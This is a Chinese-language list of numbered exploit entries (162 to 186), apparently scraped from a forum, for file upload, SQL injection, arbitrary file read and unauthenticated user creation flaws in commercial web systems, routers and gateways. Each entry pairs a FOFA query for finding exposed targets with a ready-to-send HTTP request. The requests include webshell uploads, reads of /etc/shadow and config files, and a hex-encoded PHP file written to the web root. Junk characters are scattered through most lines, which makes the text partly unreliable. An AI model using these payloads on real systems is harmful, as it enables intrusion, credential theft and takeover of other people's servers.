4 P: C- v$ ^) H9 V+ i# y9 G3 i) Z* |) E" n% X. d( `5 P
3 _! A/ @& }# X! V% n& D+ }
http://x.x.x.x/dizxdell.aspx
) h9 Z5 g3 ]; K: c+ X" I
, Y/ x) ~7 P4 ?% P! c162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 C- N T+ L4 l" k6 t3 s2 p |FOFA: app="和丰山海-数字标牌"
8 w. m7 v E. ]0 j# B7 v" fPOST /QH.aspx HTTP/1.1
" |0 a0 D2 T3 R' x& }Host: x.x.x.x
+ r; W( g; n2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 D+ Y+ Z# N/ U; F% u/ w) a
Connection: close7 M0 Q" _: c0 x9 s1 T( j
Content-Length: 583
% A5 J: \1 G7 k! e/ ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
; e0 M5 m& U$ O6 gAccept-Encoding: gzip# h) @0 i0 B$ j/ \3 V
% _% P r/ Q: P! u
------WebKitFormBoundaryeegvclmyurlotuey
# r( c7 Q) k0 x& P& U* wContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"& X; V4 j3 ?" y& l9 w: K( Z1 A* b
Content-Type: application/octet-stream5 l8 z- r! X4 x! g& j$ b
4 v3 O+ t, i/ j0 b1 F" I( T- e
<% response.write("ujidwqfuuqjalgkvrpqy") %>
' W V5 q& M9 |7 l2 \# X------WebKitFormBoundaryeegvclmyurlotuey& D. @0 l: S+ o) t3 C
Content-Disposition: form-data; name="action"
- E9 ~7 i8 B' }4 o: Z0 N; t* w; w/ k I: w$ R# j- A5 F- x Z9 s
upload3 W) H! Z) R) Z* ~% ?2 Y
------WebKitFormBoundaryeegvclmyurlotuey
# d$ L Q: w% ^ I7 |$ uContent-Disposition: form-data; name="responderId"( K* p" M9 P7 X; ^3 t
/ a9 l( u$ g5 J5 Q( s4 H
ResourceNewResponder
$ A3 B0 Y( Y% @7 i. b6 J$ g6 A' n2 R------WebKitFormBoundaryeegvclmyurlotuey5 R% o* H. ^8 D1 q3 u
Content-Disposition: form-data; name="remotePath"+ L- F3 I9 N; i# P1 M
D* c, {/ K4 b5 w, k1 s' v
/opt/resources$ m: D& j: U2 }- l' e/ K
------WebKitFormBoundaryeegvclmyurlotuey--( F- N7 ?+ t6 X# y. C7 H
' ~: n2 Q% ]6 w* K! c1 M$ Y! k+ J3 d
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
0 v" X2 r4 E% f0 s6 g% n) _/ C8 ^5 D( W$ R1 w5 ?' Q& B2 F/ w
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传# f2 H# S, }4 G. X- s/ q3 l
FOFA: icon_hash="-795291075"
! V0 C" i8 R9 T0 I# f" NPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1' M5 ?7 T; L0 n7 Y, U. ~
Host: x.x.x.x/ {% ?% S; ]# m2 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.363 E0 C6 B$ B4 E
Connection: close
# B$ q$ ]- Q" ?$ Z3 wContent-Length: 2930 j. Y D) V* @& i( V' C
Accept: */*
& W4 D0 P% t; V, c3 v x; U6 p: Y7 r" aAccept-Encoding: gzip, deflate8 Q: j, \/ o$ ~; }
Accept-Language: zh-CN,zh;q=0.9* R4 f/ W1 ]+ U; } g" V
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
4 D: L; ~. S! H3 D2 Q7 v! a' @; z- T1 m, T
------iiqvnofupvhdyrcoqyuujyetjvqgocod
; P6 s0 [: m3 C8 `) ]( j, `: DContent-Disposition: form-data; name="name"* @: i- M6 Y3 {5 |8 Z4 U3 }0 }
, J( i1 E) w7 D2 M1.php
$ b: r0 Z; g, z4 L& x------iiqvnofupvhdyrcoqyuujyetjvqgocod
" L: G& P0 \( s( E$ zContent-Disposition: form-data; name="upfile"; filename="1.php"
3 |- Z7 {5 _5 D5 S y2 gContent-Type: image/jpeg8 |5 l* @. o% p( }/ U
+ J# f! D# E5 V$ E2 N0 b# |
rvjhvbhwwuooyiioxega3 G- s7 q1 a( `* X) [" t& }
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
1 F f% d) ?/ ]- k" U) b6 a0 a- L( ^6 |9 V2 X. E2 f. Q
/ K% K" g* O8 n
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
4 w* o2 e p* W' ]FOFA: title="智慧综合管理平台登入"
0 C$ ?8 y, l7 G2 r ^: W: d) _( I3 zPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
! S$ E9 U' O7 G; E8 W# ]6 `1 z mHost: x.x.x.x; w T5 `" t+ c" @/ ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
* U& o2 ]! C; NContent-Length: 288
X, _1 V' i: e# UAccept: application/json, text/javascript, */*; q=0.01( b! w8 I7 g/ b8 v! d: }- o$ W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
; Q& D9 b Q( M3 z& v& A. }# K- iConnection: close
6 s$ F+ \3 K; A. y+ B6 f$ ~& ^Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
C4 O4 u7 K1 uX-Requested-With: XMLHttpRequest- T$ T: P0 t1 o0 E3 }2 a
Accept-Encoding: gzip
% u; V. R) Q7 E) o3 d6 A( {- g
- r. D1 o! T) e5 `# s------dqdaieopnozbkapjacdbdthlvtlyl
; g" @4 a# T6 B8 G6 fContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"6 N4 L( P9 C* J7 A. {
Content-Type: image/jpeg7 z; p% Z- U- ^; h4 t+ f2 [
1 F6 x0 X4 ]. l& X' h<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
7 p$ C- Y* M) R- t; I E! L, N------dqdaieopnozbkapjacdbdthlvtlyl--! p$ r7 d: e$ v" C9 }
+ L; O% m; a: H1 _# V+ m3 P: T3 H+ [$ a
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
* R6 k5 A# @( [' G7 w5 _- S2 }4 t4 O* u. M. t n
165. OrangeHRM 3.3.3 SQL 注入8 u% m1 T& s) [7 j
CVE-2024-36428
+ l8 O+ c d) o, y2 EFOFA: app="OrangeHRM-产品"
9 `8 q8 O7 a% \9 C/ iURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
- x; [& r9 p: }' K" |. P5 `
2 F( g. k4 d( e. ?" e3 K) K. R: A& t8 ^
166. 中成科信票务管理平台SeatMapHandler SQL注入
5 M) B, i$ P$ ?7 EFOFA:body="技术支持:北京中成科信科技发展有限公司"
2 `/ K" ~- ~% `POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1" m3 a4 ?9 p v& ]; }, W/ ?
Host:
3 ]5 |- U/ N4 b" N: Y* A( e: mPragma: no-cache
6 y" D5 w0 Q' l" f' x8 b+ TCache-Control: no-cache5 X& `0 c% q7 [" j9 f
Upgrade-Insecure-Requests: 1
; y3 X* Y' f* W, pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36. r6 d9 X2 v* o5 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# Y' i' U9 ]' P# t& d6 x
Accept-Encoding: gzip, deflate
! C: v) E/ l9 N8 r8 w! iAccept-Language: zh-CN,zh;q=0.9,en;q=0.8) m5 a9 H( b, ?: ^& c& n& u) [. j
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
+ H- y4 C% m: a$ I$ C* Z! {Connection: close+ P/ v' ^: p; f% D% Q: r
Content-Type: application/x-www-form-urlencoded
\ M& @: g# hContent-Length: 897 c5 Q. \. a' Y: Z
, ]% o6 ]; {6 M' z+ ]$ L9 h( j+ j
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
2 F0 \$ Q# i5 |
3 `1 W( V1 ^' s1 H7 S% Q2 ]) W0 U! p* p" G; O- P
167. 精益价值管理系统 DownLoad.aspx任意文件读取3 ?& t8 V* T; c# \, g2 J5 L
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
& e) E) B/ Y9 O* w3 f- sGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1/ m5 R! l3 y9 i& d; L
Host:
- y5 @; K: \' E* y7 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 n/ N% Z/ g; N3 ]3 y
Content-Type: application/x-www-form-urlencoded5 t2 s! z/ K7 x! q- i! x D- Y
Accept-Encoding: gzip, deflate# G/ y C8 U, M0 D8 F6 p
Accept: */*
6 E$ ~% N# C/ C/ x, u/ h i' ]2 ?$ M6 SConnection: keep-alive
: o! v2 Q1 j4 a/ D4 q! w3 @, R4 R0 ~* c# ^6 n- W* ?
1 l$ x( b# v0 `( g9 f168. 宏景EHR OutputCode 任意文件读取; |; [3 Q: V6 r$ Q/ c
FOFA:app="HJSOFT-HCM"
' E0 }9 U4 c0 ]% FGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1! F, \2 S% b, z& A# B* w7 j1 B
Host: your-ip
3 e' l5 ~- p8 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
1 r/ U: _( Y( [% P4 N6 F& c Q$ pContent-Type: application/x-www-form-urlencoded
6 h6 x& D: S3 F1 w- ~' _Connection: close
$ d; n6 K7 l( [' ]! o% ]" Y
8 k3 |8 v- h. q, |/ D+ q, \3 I- R
$ x- K2 k6 x; V% y# ?169. 宏景EHR downlawbase SQL注入7 ~5 V9 d: L& W2 G3 K2 l* h9 C
FOFA:app="HJSOFT-HCM", s4 `& l) g$ G9 L. {( i
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1( a3 O4 e- l9 o! W- e# R9 a. p3 `; J
Host: your-ip& i6 u, m3 B$ C/ G- t; O% [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 I3 ]' _& e; n% o$ A5 vAccept: */*
. r9 J& v+ M/ lAccept-Encoding: gzip, deflate) u+ m/ ~& @. r8 r6 X m, b2 `
Connection: close3 C- |; r9 I/ R* h0 p/ ]
: B) K4 h9 b2 l$ P
* r9 Z' c# l# u/ V9 ?7 W: i
; s0 ]# s. w" v" x170. 宏景EHR DisplayExcelCustomReport 任意文件读取
' v! b2 e* A! a6 r* n7 y1 sFOFA:body="/general/sys/hjaxmanage.js"; [$ s8 [# J8 I6 O. L3 e# R
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
5 i, I- ]0 L5 J! vHost: balalanengliang5 Z9 I' r" p5 ^, [4 |
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: l& s2 C7 V- v9 U7 TContent-Type: application/x-www-form-urlencoded
% U+ z$ m! S2 W5 K: g- C' R7 Z/ Z
- r3 i" w' k8 O8 y) m( V9 Efilename=../webapps/ROOT/WEB-INF/web.xml
' g# H- o$ o4 i8 ~( p3 I0 L" l+ M
: i5 \* L$ q8 Z' k* o) r# t; ]! }- i( N) o) F; i6 X/ i1 s* G$ S F
171. 通天星CMSV6车载定位监控平台 SQL注入
. }, g2 b( o2 Y! P. oFOFA:body="/808gps/" }& `5 @' n) G& i7 G8 p
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.13 j; [9 S2 _ [1 d6 i" \" d% o
Host: your-ip \. }$ ^9 c+ I( k8 r- ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.04 ]8 j+ R: M$ z2 K1 ?9 O; I% p
Accept: */*
& ], S, [' h/ n' I+ GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, s% a3 X# J8 _Accept-Encoding: gzip, deflate" f9 e( L/ [, t5 @! t
Connection: close
# m/ y3 C8 z( X0 m a2 H/ D, ]+ T; p
% H! e; H, l3 M# R$ O9 U8 A( m5 H4 l. ~+ B
172. DT-高清车牌识别摄像机任意文件读取
B3 Z' n1 \( n& v$ a7 d/ kFOFA:app="DT-高清车牌识别摄像机"* b6 ~( M* e& i, J
GET /../../../../etc/passwd HTTP/1.1
# X4 H( i: }( `# i1 s' VHost: your-ip( `% U" ~" N9 o, o* m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& e8 C3 @7 y d% Y" K* a
Accept-Encoding: gzip, deflate P5 ]7 S# p/ c9 o4 o) S
Accept: */*
1 `) _& i! C6 H$ M" PConnection: keep-alive+ d4 ?) x2 v* u/ s F
' I t) ?1 N- l* D8 q' Q3 E5 d
7 a( x$ L3 U9 `1 G% H9 }
7 x" v {' |# y173. Check Point 安全网关任意文件读取
/ n6 U* D0 X! K, mCVE-2024-249193 A7 ~/ T5 e2 |
FOFA:app="Check_Point-SSL-Network-Extender"
: E) O S& [& DPOST /clients/MyCRL HTTP/1.1+ x6 |0 ?4 i9 D4 F, W- E, B
Host: your-ip) q3 [- u4 u% v: r% a
Content-Type: application/x-www-form-urlencoded! o0 [) X" i) u" X( d+ n: J
! ^' a$ w0 S: ~0 O1 O% K0 _aCSHELL/../../../../../../../etc/shadow. k6 k) a' a4 ^
& n j( ^; D& N
! J: d* F" P+ e( g. _: F7 W" j$ V% |8 {7 n" x1 S9 O
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
; w; h0 |. O5 [" `FOFA:app="金和网络-金和OA"
; _/ [: t O! _4 K2 HGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
1 S0 l/ C& N( H L& k1 }Host: your-ip
) f$ Z) ]# M9 D& U$ }5 Z$ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 f5 L$ ^& t. {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ G" I0 N2 _- q U$ l
Accept-Encoding: gzip, deflate, br, Z7 j. h* M) v# K$ M
Accept-Language: zh-CN,zh;q=0.9: J$ K+ x7 g! m* V, }6 P
Connection: close
, _& E C! {7 q2 h5 O6 k3 a$ Q% p" j+ v* b b
# z/ H0 r( Z/ t, ^* Y# W) R, b0 L3 J
% a6 X- e* i! @& P
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入! W; P8 k8 i- [8 m+ D- o
FOFA:app="金和网络-金和OA"" r' I* H3 C" O
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1" E# K* f: X1 x! b9 u
Host:
! n, l8 r0 k4 u) @4 HUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 f5 B& i1 m: l# V: g4 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 a& x! `3 \' D6 Q% E% ]( ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 j) \6 a! Y0 R# T+ i
Accept-Encoding: gzip, deflate
! k7 {1 e: |) ~/ x# fConnection: close
2 y& w- M ~) cUpgrade-Insecure-Requests: 1
3 ?1 g& N6 O% _! U" k& }3 f3 i$ G& n* K8 O; G
?# j# L& e @176. 电信网关配置管理系统 rewrite.php 文件上传% k" P; g7 z( R9 ?5 W
FOFA:body="img/login_bg3.png" && body="系统登录"
* `5 l& D1 h) u% E' x) \POST /manager/teletext/material/rewrite.php HTTP/1.1/ {6 T- Q2 O1 G1 k, ^, L
Host: your-ip0 g9 j9 X C7 L# f% b; W/ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 E. ?2 ?* m. O& w7 ?5 x" v o3 wContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
6 U1 d8 s' j0 q, P' m( `7 mConnection: close1 k4 F9 _6 o! n; X2 }, _8 R
2 J8 J) W0 r) } Y, c, m------WebKitFormBoundaryOKldnDPT* g" T5 R- ]' \' b. w
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
( A- C$ c$ a% D* T) q {Content-Type: image/png8 V0 {( Y6 I; u% z, X8 c8 x" g
1 S/ r$ H! m! R6 ^1 t+ {4 H1 m
<?php system("cat /etc/passwd");unlink(__FILE__);?>
" @ A7 P) C# H* a) k" w6 B) v------WebKitFormBoundaryOKldnDPT0 |) w9 v+ ^0 s* M9 \0 U% ]
Content-Disposition: form-data; name="uploadtime"
" M& v2 p; |/ L* z
( |% m' ?8 s! q . q" T+ T/ w9 H7 A4 w# k
------WebKitFormBoundaryOKldnDPT--# S6 \& f! X+ K# v+ X8 \. s3 N( w# J
/ O0 E3 Z+ I. T
" E' Z4 q- D a+ l, E' @
1 s6 E( f [( j& e177. H3C路由器敏感信息泄露
, P) K9 y9 Y2 C- c0 w8 v, n/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
2 F, E$ O1 x' \/userLogin.asp/../actionpolicy_status/../M60.cfg
% L& Q' T S& I5 F1 z' a5 d& T/userLogin.asp/../actionpolicy_status/../GR8300.cfg
$ L% z% c+ b7 C2 D3 I. T/userLogin.asp/../actionpolicy_status/../GR5200.cfg& B- L0 R& D* _7 B/ K0 n' A
/userLogin.asp/../actionpolicy_status/../GR3200.cfg, |2 [. D" y; \ ], R! ]- }
/userLogin.asp/../actionpolicy_status/../GR2200.cfg3 U& @" a' P7 O# v
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg; G2 z5 a# X! C6 N6 `/ l1 p( J
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
) i$ L8 Z# D% t4 v/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg1 {3 [$ r" E! P g3 q
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
- j) n$ s i) R/ M; G/userLogin.asp/../actionpolicy_status/../ER5200.cfg- W# x+ Y/ a$ m$ `: h2 [" O
/userLogin.asp/../actionpolicy_status/../ER5100.cfg5 A" L7 o! f) I3 u* v: Y. k$ D- U
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg5 _* [" o. M9 ^% A9 b S, }
/userLogin.asp/../actionpolicy_status/../ER3260.cfg+ m& W- K6 p" O3 M. @' d
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg0 B/ N) [* W9 S% b* q/ t/ E7 r
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/ w& E# I* A7 A/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
5 \& r7 J! s, n, L y/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
. ?$ v5 z+ ]: M1 ^; ^4 a$ F/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg/ r% S7 q! ?" E, p. b
/userLogin.asp/../actionpolicy_status/../ER3100.cfg" R1 E+ B) {' X3 r
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg/ a) |4 u5 s' f/ z A: ^2 r
: f! `& [+ f: v1 K, D2 @2 n* K9 K% I0 D
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
# w8 e$ Y! J& w' b5 _2 g: \6 lFOFA:header="/selfservice"
0 V4 ]6 n9 @/ c5 @ Q8 H; ?POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
9 U: E$ Q* X! e! I: \Host:) N3 O c2 B- q- B7 u- o# c' U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& H( W3 N+ ]: H) G, @Content-Length: 252
8 ^+ N; m N$ V+ sAccept-Encoding: gzip, deflate
# B4 V# w0 ?6 rConnection: close- u0 x2 G' ` i8 A7 z" j) b. B, E
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l# T+ N* {8 u H0 c1 Y# b5 ]. F
-----------------aqutkea7vvanpqy3rh2l+ h- D4 v( F2 g
Content-Disposition: form-data; name="12234.txt"; filename="12234" j8 Z- k6 \/ D6 [/ ]' {# Q, P
Content-Type: application/octet-stream) g% _. O+ i9 Q: S1 N
Content-Length: 255 _1 S8 P8 X i* T/ w9 ?
7 _4 b' k/ a' L7 b1 a
12234
/ g# f+ N4 d) s2 P4 ?5 E' F3 t-----------------aqutkea7vvanpqy3rh2l--
8 T6 C4 S! T4 A) Y
" l. y/ K k+ A, Q& P( h% d- m' j' K4 {! i
GET /imc/primepush/%2e%2e/flex/12234.txt: e+ n. [; m. b) X3 K( ^' r. z- N% ]
8 N1 P# q! V" V5 V* E
" b9 P4 z) y. O: |& j& ~! ~179. 建文工程管理系统存在任意文件读取5 ^! ?, ~* C( k" P
POST /Common/DownLoad2.aspx HTTP/1.1
& R7 O# l9 e; _ wHost: {{Hostname}}
8 P+ h. b* R) S X4 b9 eContent-Type: application/x-www-form-urlencoded. n- ]# M! x" a" ^, w; }
User-Agent: Mozilla/5.03 A; F) F& u. x) ?! G, a: ~% r, f
# l7 H' m6 g/ p/ ?. Z1 o
path=../log4net.config&Name=
5 F7 J% o8 X6 w
- n* @4 u9 v b& {9 L* \0 E A; h& n! E3 c
180. 帮管客 CRM jiliyu SQL注入( f7 W8 M( _; p) i, T9 _+ y0 v
FOFA:app="帮管客-CRM"
5 d, @9 v( l/ G* qGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.10 L( d Y/ z3 S9 k
Host: your-ip u, I$ K3 T# l+ H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" x( y3 x' o3 }/ cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( `; {) S2 u: Y! A. F
Accept-Encoding: gzip, deflate
; E( a& q0 P( n/ V$ ^Accept-Language: zh-CN,zh;q=0.9
3 K& p: v4 ]. Q" j- t! nConnection: close
0 G: [+ R2 k7 X, P" F
5 }; ?6 {, t- E! ?, ?) p- N w; N
) p! n$ i: D1 B4 x181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入6 `7 H( G( x' y1 g B
FOFA:"PDCA/js/_publicCom.js"
4 Q, ?7 |7 b7 h SPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
4 m8 ? z# L( o$ e( ^( B. `+ JHost: your-ip
) v/ k: [8 N( ]6 d' DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! b. k; B; p/ r; Y8 A4 G# f. zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 ~" p6 ~$ W2 [+ x
Accept-Encoding: gzip, deflate, br
. G$ s3 A1 F& ? H& BAccept-Language: zh-CN,zh;q=0.9
# V4 Z0 c! g! j( X6 ?6 E" {Connection: close6 v% @" ^- n4 d& D2 I1 @0 k
Content-Type: application/x-www-form-urlencoded# N& f _; Y" ^9 i) U5 I
0 m) Q1 g( S4 e# z2 T& b
. q5 x& d, \ N7 ?2 e% M& _. [: D* ~$ kaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
( {% C8 E( G; W" C3 ^; V8 _! T+ c# U2 [. F) n
; d E O5 t& Q" G9 m$ B1 ?) O% T
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
8 M! k8 C$ f: C9 X5 o5 _FOFA:"PDCA/js/_publicCom.js"3 K" r: i# X' |7 ]* D
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
! \. J3 _8 L4 M3 M# fHost: your-ip9 w: p- j) S! ?3 ?, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36% W! @ Q2 W6 r7 |+ V) H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 a' p. t, P% b: L3 u
Accept-Encoding: gzip, deflate, br
/ Y, h* B t( X3 e0 H' f; M3 W: _Accept-Language: zh-CN,zh;q=0.96 x, O; z7 [2 [5 v7 G
Connection: close
% d1 j) W4 \8 aContent-Type: application/x-www-form-urlencoded) p6 X7 p, C9 q" ~. V! T. d' G
i: `, Q A( h r! n- T3 N. S/ Q8 a( u8 p8 l3 A
username=test1234&pwd=test1234&savedays=18 S0 w1 Q, |% k E, v2 A* r3 Y
" z( r" y6 E; w& T) Q& i1 a. C
/ L9 O/ G% U3 W/ {2 h. L% o9 }183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入& I. G* ?8 t" k y8 Y* p9 T
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"! t8 e+ Q1 r* A" d; o' b
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.12 @' i; `* s) M) |' X5 s
Host: your-ip
$ w5 [$ \& f5 g2 b3 F+ l0 l# x) w) ?User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( T9 x" {1 g+ b) p7 yAccept-Charset: utf-8
, ?) B$ X# W( X' Z7 K8 x' KAccept-Encoding: gzip, deflate
& e( r$ J7 w6 }% e3 ?/ a2 kConnection: close$ ^0 O4 a0 C2 X0 i& `
: _- z& K# s1 M J
w8 O2 e% p: `9 F184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加5 H; \7 {: ]' m; L3 Q
FOFA:server="SunFull-Webs"
6 }( L/ t7 W7 J( v, E% e; UPOST /soap/AddUser HTTP/1.17 k5 w* ^% P8 R) K0 K+ O
Host: your-ip
9 C6 q/ x/ l- X* D, BAccept-Encoding: gzip, deflate' `0 g: m* x* D. D/ r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0/ L) a5 a1 v1 q: J y4 S% _
Accept: application/xml, text/xml, */*; q=0.01
2 P+ {, D; A7 D) PContent-Type: text/xml; charset=utf-8/ v" \% P2 \6 e8 B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; N' P2 {/ n6 e1 W5 Z
X-Requested-With: XMLHttpRequest
- S8 l7 ~0 F/ K% s9 O( ~+ P
3 s# l6 F- o0 S: j( M
& b# i q P/ S% G% e! v1 ?insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
; @3 J; f3 `( M+ b, g* d4 O8 Z ^
. Y, L% T/ a2 u( b% D
& R" v5 @& q7 s* F [. v$ J7 c) ^185. 瑞友天翼应用虚拟化系统SQL注入
7 {0 m5 i+ m% mversion < 7.0.5.1
9 d/ t8 i7 z UFOFA:app="REALOR-天翼应用虚拟化系统"
* l9 B! {; E) YGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1" d1 ?. q! z! p7 Q- Y( l
Host: host* Q9 N- {# K; ?
- Z- q; b- v1 w' G3 q D) d) z
- S e0 \! P7 Q, m. j( z186. F-logic DataCube3 SQL注入
